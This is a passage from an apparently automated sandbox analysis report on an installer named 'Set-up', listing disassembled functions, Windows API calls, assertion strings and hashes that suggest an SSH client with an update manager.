                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                    • Part of subcall function 00E63A10: EnterCriticalSection.KERNEL32(0131BA1C,460C02D8), ref: 00E63A8D
                                                                                                                                    • Part of subcall function 00E63A10: LeaveCriticalSection.KERNEL32(0131BA1C,000000FF,?,0131BA48,00000001,0131B9B8,00000000), ref: 00E63AFB
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,0131B8F8,00000000,460C02D8), ref: 00E6295D
                                                                                                                                  Strings
                                                                                                                                  • !af_, xrefs: 00E62946
                                                                                                                                  • datavect<struct SshClient::Console::OutParam *>::operator [], xrefs: 00E6292D
                                                                                                                                  • ncvector<struct SshClient::Console::OutParam>::operator [], xrefs: 00E62941
                                                                                                                                  • !af_ && i<s_, xrefs: 00E62932
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$Enter$ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: !af_$!af_ && i<s_$datavect<struct SshClient::Console::OutParam *>::operator []$ncvector<struct SshClient::Console::OutParam>::operator []
                                                                                                                                  • API String ID: 1941180888-1306365089
                                                                                                                                  • Opcode ID: a6c641c4c191c6c0cceb388114c21708d194e93bf5d8a5ac7853dc3fc29e2d75
                                                                                                                                  • Instruction ID: 7433b0d309b6693a1c2235a84dd0476f621fe414d84b7e80d365d8034b4f47e1
                                                                                                                                  • Opcode Fuzzy Hash: a6c641c4c191c6c0cceb388114c21708d194e93bf5d8a5ac7853dc3fc29e2d75
                                                                                                                                  • Instruction Fuzzy Hash: 2B312430A80A48AEDF21DF64EC41BAEB7F8EF90794F10552DF911732C2CB706A058761
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000000,00000000,460C02D8), ref: 00E51E1E
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E51E2C
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E51E55
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • GetTempPathW.KERNEL32(00000000,00000000,00000001,?,?), ref: 00E51EDC
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E51F12
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PathTemp$Concurrency::cancel_current_taskErrorExceptionException@8LastRaiseThrow
                                                                                                                                  • String ID: GetTempPath()
                                                                                                                                  • API String ID: 2063755193-631742751
                                                                                                                                  • Opcode ID: 662888edbc873b65f6c33da7e81f0f5875592f06a485a30d6e57e61ba2476967
                                                                                                                                  • Instruction ID: bd5ec0c9e7ccbdc5c6636a570a0607b886d1c722bf831617c59f61e772abbf95
                                                                                                                                  • Opcode Fuzzy Hash: 662888edbc873b65f6c33da7e81f0f5875592f06a485a30d6e57e61ba2476967
                                                                                                                                  • Instruction Fuzzy Hash: C231F4716006059BCB24EF68CC56B6FB7F9EF84B15F10492EE915A7280DFB5A8088791
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E7B427
                                                                                                                                    • Part of subcall function 00E3A2C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3A2D7
                                                                                                                                    • Part of subcall function 00E3A2C0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3A321
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw___std_exception_copy
                                                                                                                                  • String ID: !!p$!af_$!af_ && i<s_$datavect<struct UpdateInfo *>::at$ncvector<struct UpdateInfo>::attach_back
                                                                                                                                  • API String ID: 2281437974-43309490
                                                                                                                                  • Opcode ID: b6dfb1ad63c38ffe407457dd93dbf4f94eeabd981d95ec286f9a4c93825b1847
                                                                                                                                  • Instruction ID: 4edbc91935410cc6fbb544e3fb2bcd2295f48e42dc8c1d43b0fe2ecc3f911953
                                                                                                                                  • Opcode Fuzzy Hash: b6dfb1ad63c38ffe407457dd93dbf4f94eeabd981d95ec286f9a4c93825b1847
                                                                                                                                  • Instruction Fuzzy Hash: 1A31E571604204DFCB24DF54D881B6DF7F4EF44724F10926AE829AF2C6EB71A900CB61
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E703E7
                                                                                                                                    • Part of subcall function 00E3A2C0: __CxxThrowException@8.LIBVCRUNTIME ref: 00E3A2D7
                                                                                                                                    • Part of subcall function 00E3A2C0: ___std_exception_copy.LIBVCRUNTIME ref: 00E3A321
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_taskException@8Throw___std_exception_copy
                                                                                                                                  • String ID: !!p$!af_$!af_ && i<s_$datavect<struct WWLib::RegItem *>::at$ncvector<struct WWLib::RegItem>::attach_back
                                                                                                                                  • API String ID: 2281437974-2121110380
                                                                                                                                  • Opcode ID: 2992c794f9f0984e642098cf96f500dee84cc1acadf6302a7774abd726090eb7
                                                                                                                                  • Instruction ID: d97793e5d0fc86bbf707bd68255f7782a92595c3328f621c808a159089404336
                                                                                                                                  • Opcode Fuzzy Hash: 2992c794f9f0984e642098cf96f500dee84cc1acadf6302a7774abd726090eb7
                                                                                                                                  • Instruction Fuzzy Hash: 9031E371600204DFCB24DF54D981B9AF7F4FB54320F10966AE929AB3C5EB71AD00CB61
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0112CDDC: _free.LIBCMT ref: 0112CE05
                                                                                                                                  • _free.LIBCMT ref: 0112D0E3
                                                                                                                                    • Part of subcall function 01126F59: HeapFree.KERNEL32(00000000,00000000,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?), ref: 01126F6F
                                                                                                                                    • Part of subcall function 01126F59: GetLastError.KERNEL32(?,?,0112CE0A,?,00000000,?,00000000,?,0112D0AE,?,00000007,?,?,0112D8DE,?,?), ref: 01126F81
                                                                                                                                  • _free.LIBCMT ref: 0112D0EE
                                                                                                                                  • _free.LIBCMT ref: 0112D0F9
                                                                                                                                  • _free.LIBCMT ref: 0112D14D
                                                                                                                                  • _free.LIBCMT ref: 0112D158
                                                                                                                                  • _free.LIBCMT ref: 0112D163
                                                                                                                                  • _free.LIBCMT ref: 0112D16E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 3416b74a0895299f2957c68b9f2b763de3de6214ce0b0644f2df9369b365a1ec
                                                                                                                                  • Instruction ID: 57b4790a945562a711167ae76158b0c531d64b8001324d5c5fdc8165e5b0d593
                                                                                                                                  • Opcode Fuzzy Hash: 3416b74a0895299f2957c68b9f2b763de3de6214ce0b0644f2df9369b365a1ec
                                                                                                                                  • Instruction Fuzzy Hash: 24118472980B29AADB28B7B0DC05FCF7BAC5F50704F400C18E79D6A090D774F92486D1
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$NumCast$first < last$ncvector<unsigned int>::assign$value >= 0
                                                                                                                                  • API String ID: 0-1978602762
                                                                                                                                  • Opcode ID: 16e07bbdb0e62535989f6f6b0d1be0c35e63ffd2c4957aded5ad9e5086bdb2d5
                                                                                                                                  • Instruction ID: 62922832f85aa50bdcee58b45daf38dd7e4415840d41c9235781e56747531cb5
                                                                                                                                  • Opcode Fuzzy Hash: 16e07bbdb0e62535989f6f6b0d1be0c35e63ffd2c4957aded5ad9e5086bdb2d5
                                                                                                                                  • Instruction Fuzzy Hash: 731129F27902067BD718ABA5AD46F56B3C8AB70714F00122DFA557B1C1EBB1E901C6E4
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,0111D011,0111AB4D,460C02D8,?,00E5119D,00E4FCD0,00E3A8EB,460C02D8), ref: 0111D028
                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0111D036
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0111D04F
                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,0111D011,0111AB4D,460C02D8,?,00E5119D,00E4FCD0,00E3A8EB,460C02D8), ref: 0111D0A1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                  • Opcode ID: aed4f0cbde9c709dd9341b06f352cf77666e33908bcc2ef0d76d2d3bd87d1554
                                                                                                                                  • Instruction ID: a434b9aa113e428b5978d1edca3af12e9ed421b353ae8a8e7554a0a8adf10d2f
                                                                                                                                  • Opcode Fuzzy Hash: aed4f0cbde9c709dd9341b06f352cf77666e33908bcc2ef0d76d2d3bd87d1554
                                                                                                                                  • Instruction Fuzzy Hash: E501DD321092365FEF3E25F87CD8A6BAB88DB017B4720033AE514D00DDFF5298469641
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,460C02D8,00000000,00000000), ref: 00F130A1
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(00000000,?,460C02D8,00000000,00000000), ref: 00F130B6
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,460C02D8,00000000,00000000), ref: 00F130C2
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F130EB
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,460C02D8,00000000,00000000), ref: 00F13103
                                                                                                                                  Strings
                                                                                                                                  • QueryPerformanceCounter(), xrefs: 00F130D0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CounterEnterErrorExceptionException@8LastLeavePerformanceQueryRaiseThrow
                                                                                                                                  • String ID: QueryPerformanceCounter()
                                                                                                                                  • API String ID: 3202828375-1461196644
                                                                                                                                  • Opcode ID: 290d6d2164ce3f87f1c9634b403d61997d70bea0e733c26c7bc43dde67cb9f61
                                                                                                                                  • Instruction ID: 9acd49d71d9161d28d9f90166d24c4e0f7a582cd5da2aacfd5e469c61cffb4d4
                                                                                                                                  • Opcode Fuzzy Hash: 290d6d2164ce3f87f1c9634b403d61997d70bea0e733c26c7bc43dde67cb9f61
                                                                                                                                  • Instruction Fuzzy Hash: CD119D71905205AFCB24DF69C985B9EBBFCFB09B14F10066AE811E3380DBB065048BA1
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E6CE60: RegCloseKey.ADVAPI32(012A03EC,460C02D8,?), ref: 00E6CEA1
                                                                                                                                  • new.LIBCMT ref: 00E7F419
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close
                                                                                                                                  • String ID: !af_$BvUpdateManager::Load$datavect<unsigned char>::empty
                                                                                                                                  • API String ID: 3535843008-4123486968
                                                                                                                                  • Opcode ID: 755390490dc04309d5dbb2151169ae1230fd2a6b044ced19597f063df1cac139
                                                                                                                                  • Instruction ID: d298b52739258c7962bc4475746b9f2ecddb65de3b91fec1a92ba5258f6e547a
                                                                                                                                  • Opcode Fuzzy Hash: 755390490dc04309d5dbb2151169ae1230fd2a6b044ced19597f063df1cac139
                                                                                                                                  • Instruction Fuzzy Hash: 92F1AC70D04249DFEF15CFA4C954BEEBBB0AF14308F2481ADE4097B281DBB66A44CB91
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,460C02D8,00000000), ref: 00E7346F
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,00000000), ref: 00E734BE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: X$X$BvUpdateManager::Thread::Execute$param.Get() && param->m_result.Get()
                                                                                                                                  • API String ID: 3168844106-899597624
                                                                                                                                  • Opcode ID: e782c2e1a1f73011aba48167179618294e5f419bb449730018b8bc1205761b89
                                                                                                                                  • Instruction ID: 5aa08c9d1abc5e06171c950e94fef069fbde1a0e0a13eaba44a45cf69da77cdf
                                                                                                                                  • Opcode Fuzzy Hash: e782c2e1a1f73011aba48167179618294e5f419bb449730018b8bc1205761b89
                                                                                                                                  • Instruction Fuzzy Hash: AC41AD74A04345EFDB25DF68C881BAEFBF4EF05308F148099E945A7782C775AA04DBA1
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E62A10
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?,?,?,?,?,?,01167728), ref: 00E62AC9
                                                                                                                                  Strings
                                                                                                                                  • !af_, xrefs: 00E62A56
                                                                                                                                  • datavect<struct SshClient::BvConsole::CaptureEntry *>::size, xrefs: 00E62A51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalEnterSection
                                                                                                                                  • String ID: !af_$datavect<struct SshClient::BvConsole::CaptureEntry *>::size
                                                                                                                                  • API String ID: 1904992153-191288321
                                                                                                                                  • Opcode ID: ae4c7cd0f4406a892c3dca12c423211cdad48aea62211c69e01f667e426d8f6f
                                                                                                                                  • Instruction ID: 33f7548c011acf620dd0231d069f6e7c262871a250f2c381f07ad2813826cb01
                                                                                                                                  • Opcode Fuzzy Hash: ae4c7cd0f4406a892c3dca12c423211cdad48aea62211c69e01f667e426d8f6f
                                                                                                                                  • Instruction Fuzzy Hash: 8571D371E44648AFCF24DFA8E844BAEBBF8EB04354F00566DE921B7380DB30A904CB50
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E48350: GetFileSizeEx.KERNEL32(?,?), ref: 00E4839C
                                                                                                                                  • WriteFile.KERNEL32(?,?,00010000,?,00000000,460C02D8), ref: 00E48295
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$BreakConcurrency::cancel_current_taskDebugDebuggerModuleNamePresentSizeWrite
                                                                                                                                  • String ID: !af_ && i<s_$WriteFile()$datavect<unsigned char>::operator []
                                                                                                                                  • API String ID: 1519757512-2157800795
                                                                                                                                  • Opcode ID: c13d421e52167bff1dabdccefb49eaa21159e99a7029f3b4d196a78f4d14aead
                                                                                                                                  • Instruction ID: 5dd75d8d0027220f92fcd8914b6e57eea11abb27989541923fd10c30d8640ffb
                                                                                                                                  • Opcode Fuzzy Hash: c13d421e52167bff1dabdccefb49eaa21159e99a7029f3b4d196a78f4d14aead
                                                                                                                                  • Instruction Fuzzy Hash: 2061C171A047499FCB28CFA5E584B9EBBF4EF54314F14822EE855A7290DBB1A904CB90
                                                                                                                                  APIs
                                                                                                                                  • GetFileType.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00E6444B
                                                                                                                                  • GetFileSizeEx.KERNEL32(?), ref: 00E64481
                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00E6452E
                                                                                                                                  Strings
                                                                                                                                  • !af_ && i<length(), xrefs: 00E644AD
                                                                                                                                  • basic_ncstring<wchar_t>::operator [], xrefs: 00E644A8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$SizeType___std_exception_copy
                                                                                                                                  • String ID: !af_ && i<length()$basic_ncstring<wchar_t>::operator []
                                                                                                                                  • API String ID: 4171821136-589021327
                                                                                                                                  • Opcode ID: a5b6d60eeedd3527252597a1ffbf10d5cf73c41be325ecb29c4dc37fdabdd9b5
                                                                                                                                  • Instruction ID: 96fc55adc21156932cddced78738466d8fff9b7fd4d24990a44f333df96dda16
                                                                                                                                  • Opcode Fuzzy Hash: a5b6d60eeedd3527252597a1ffbf10d5cf73c41be325ecb29c4dc37fdabdd9b5
                                                                                                                                  • Instruction Fuzzy Hash: 8551AAB4650204DFD725CF08E845BAABBF8FB49328F248559E865AB395D772ED04CB80
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E75CE2
                                                                                                                                  • new.LIBCMT ref: 00E75CF5
                                                                                                                                    • Part of subcall function 01119334: Concurrency::cancel_current_task.LIBCPMT ref: 0111934C
                                                                                                                                  • new.LIBCMT ref: 00E75D42
                                                                                                                                  Strings
                                                                                                                                  • result.IsType<DownloadAndStartResult>(), xrefs: 00E75E6A
                                                                                                                                  • BvUpdateManager::RunDownloadAndStartUpdateThread, xrefs: 00E75E65
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: BvUpdateManager::RunDownloadAndStartUpdateThread$result.IsType<DownloadAndStartResult>()
                                                                                                                                  • API String ID: 118556049-2401601241
                                                                                                                                  • Opcode ID: dfbc4219ccffbc89e08ee4420943fe642b57bc92b6ab61daa79aec51ae7f8736
                                                                                                                                  • Instruction ID: 4ecfe5a3474e1e962abcbdad27f533134191481352c9258dd68aa65c1cb21807
                                                                                                                                  • Opcode Fuzzy Hash: dfbc4219ccffbc89e08ee4420943fe642b57bc92b6ab61daa79aec51ae7f8736
                                                                                                                                  • Instruction Fuzzy Hash: 2451AFB1905349DAEB10DFA4C905B9EBBF4EF00708F10805DE519BB2C1DBF6AA04CBA1
                                                                                                                                  APIs
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00F7A887
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: (where >= p_) && (where <= p_ + s_)$c_ >= s_$datavect<struct QuantumRegistry::Entry *>::insert$last >= first
                                                                                                                                  • API String ID: 118556049-116943243
                                                                                                                                  • Opcode ID: ee715c34f6afb3ed9142d522790d7293edb325d965cf69028f2034342810bcac
                                                                                                                                  • Instruction ID: def5ce17ec013a1737eeaa50acd32ee77c120576348a35bd08d27e4346902534
                                                                                                                                  • Opcode Fuzzy Hash: ee715c34f6afb3ed9142d522790d7293edb325d965cf69028f2034342810bcac
                                                                                                                                  • Instruction Fuzzy Hash: 4C41D832B002069FCF18CF68D48199DB7F5EBC4314B16C16EE41997641EA70AA42D783
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: NumCast$RegOpenKeyExW()$RegOpenKeyTransactedW()$value >= 0
                                                                                                                                  • API String ID: 0-988358046
                                                                                                                                  • Opcode ID: 4dcbaf3671b47b1be6282e8479729a7c4376bb2307d71675ffcf4163272d49d5
                                                                                                                                  • Instruction ID: 99e88f1420b64704499c4e5bc937790529841d1b8a7725af4b94da1741febd56
                                                                                                                                  • Opcode Fuzzy Hash: 4dcbaf3671b47b1be6282e8479729a7c4376bb2307d71675ffcf4163272d49d5
                                                                                                                                  • Instruction Fuzzy Hash: 27416A31B48205ABC724DF24FC45B69BB95FF847A4F04512AE826AB2C5CB71AC15C7C1
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00E77C5F
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E77C97
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E77CC2
                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,01303710,?), ref: 00E77D41
                                                                                                                                    • Part of subcall function 00E51860: WaitForSingleObject.KERNEL32(?,460C02D8,460C02D8), ref: 00E5188F
                                                                                                                                    • Part of subcall function 00F06D70: EnterCriticalSection.KERNEL32(0000000C,460C02D8,00000000,00E7C2D7), ref: 00F06DAE
                                                                                                                                    • Part of subcall function 00F06D70: LeaveCriticalSection.KERNEL32(0000000C), ref: 00F06DD3
                                                                                                                                    • Part of subcall function 00F06D70: EnterCriticalSection.KERNEL32(0000000C), ref: 00F06DFA
                                                                                                                                    • Part of subcall function 00F06D70: LeaveCriticalSection.KERNEL32(0000000C), ref: 00F06E1C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave$AttributesErrorEventException@8FileLastObjectSingleThrowWait
                                                                                                                                  • String ID: SetEvent()
                                                                                                                                  • API String ID: 901363289-2184393977
                                                                                                                                  • Opcode ID: b4c02c3713953265d83b6898761df089b3e68b895b9cb788bd29956c4b6b8c33
                                                                                                                                  • Instruction ID: bc0e424e3bc7bda91e70a95072fdbf0c7520949d4bf1b721a7b8f759be9ea4b2
                                                                                                                                  • Opcode Fuzzy Hash: b4c02c3713953265d83b6898761df089b3e68b895b9cb788bd29956c4b6b8c33
                                                                                                                                  • Instruction Fuzzy Hash: 0041F471A042099FDB24DFA4DD41BAEBBF4FF05324F10426DE865A72C0EB76A904CB90
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E699C0: new.LIBCMT ref: 00E69A39
                                                                                                                                  • CreateFileW.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000080,00000000,00000000,00000000,460C02D8), ref: 00E6B433
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6B47D
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6B4C1
                                                                                                                                  • GetLastError.KERNEL32(?,01303B34,?,?,CreateFileW()), ref: 00E6B4CB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateException@8FileThrow
                                                                                                                                  • String ID: CreateFileW()
                                                                                                                                  • API String ID: 2070419038-3282452705
                                                                                                                                  • Opcode ID: 10c9d5e0487b47db72063f3223759db14c467203d43a6391f17dd18b10f0a07e
                                                                                                                                  • Instruction ID: b8976a7547078f7d8567f7d57b977d20a2696a39a692986f893b0fc2a7d965c1
                                                                                                                                  • Opcode Fuzzy Hash: 10c9d5e0487b47db72063f3223759db14c467203d43a6391f17dd18b10f0a07e
                                                                                                                                  • Instruction Fuzzy Hash: A9418C7194124AEFDF14DFA4D849BAEBBF8FF04314F104169E425E7281EB79A948CB90
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E6CD00: GetCurrentProcess.KERNEL32(?,00000000,?,00000400), ref: 00E6CE1A
                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,00000000,00000000,00000000,460C02D8,00000002,00000000,00000000,00000000,0131A974,460C02D8,?,00000000), ref: 00E6F83E
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6F893
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDeleteExceptionException@8ProcessRaiseThrowValue
                                                                                                                                  • String ID: NumCast$RegDeleteValueW()$value >= 0
                                                                                                                                  • API String ID: 1616290930-4130027338
                                                                                                                                  • Opcode ID: 251935ab79e847db1fc99bf966e79d8189c22097af5ea6349748d51242394f25
                                                                                                                                  • Instruction ID: 2471f6f0520323988783643ade6570e89ed00728cf43607ac264916f9b61891c
                                                                                                                                  • Opcode Fuzzy Hash: 251935ab79e847db1fc99bf966e79d8189c22097af5ea6349748d51242394f25
